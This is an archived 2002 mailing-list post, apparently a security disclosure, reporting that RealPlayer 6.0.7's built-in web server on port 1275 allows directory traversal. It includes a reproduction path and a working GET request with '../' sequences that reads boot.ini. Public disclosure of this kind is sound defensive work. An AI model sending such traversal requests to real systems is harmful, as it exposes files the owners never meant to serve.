RealPlayer bug

From: §ome (exeat_private)
Date: Sat Mar 02 2002 - 10:16:53 PST

Next message: Peter Wu: "Re: IE execution of arbitrary commands without Active Scripting or ActiveX (GM#001-IE)"

Previous message: iphantomiat_private: "Denial of Service in Sphereserver"
Next in thread: Michiel Heijkoop: "Re: RealPlayer bug"
Reply: Michiel Heijkoop: "Re: RealPlayer bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

hi
open RealPlayer, go to --> File ---> Open File.. ---> Select any real media
file.. ex: c:\music\file.ram
Play the file.

Now go to ---> View ---> Clip Source

realplayer will open the url
http://127.0.0.1:1275/template.html?src=file://C:/music/file.ram
from now realplay.exe will listen on port 1275 TCP

as you can see, real player have a (Mini WebServer) that listen on port 1275

I only tested the ../../ bug

GET http://127.0.0.1:1275/../../../../../boot.ini
Result: my boot.ini

Vulnerable version: 6.0.7

other version? maybe..


C:\>fport |grep real
Pid       Process       Port      Proto     Path
1964    realplay   ->  1275     TCP      C:\Program
Files\Real\RealPlayer\realplay.exe



§ome1
exeat_private

Next message: Peter Wu: "Re: IE execution of arbitrary commands without Active Scripting or ActiveX (GM#001-IE)"
Previous message: iphantomiat_private: "Denial of Service in Sphereserver"
Next in thread: Michiel Heijkoop: "Re: RealPlayer bug"
Reply: Michiel Heijkoop: "Re: RealPlayer bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Mar 03 2002 - 12:23:53 PST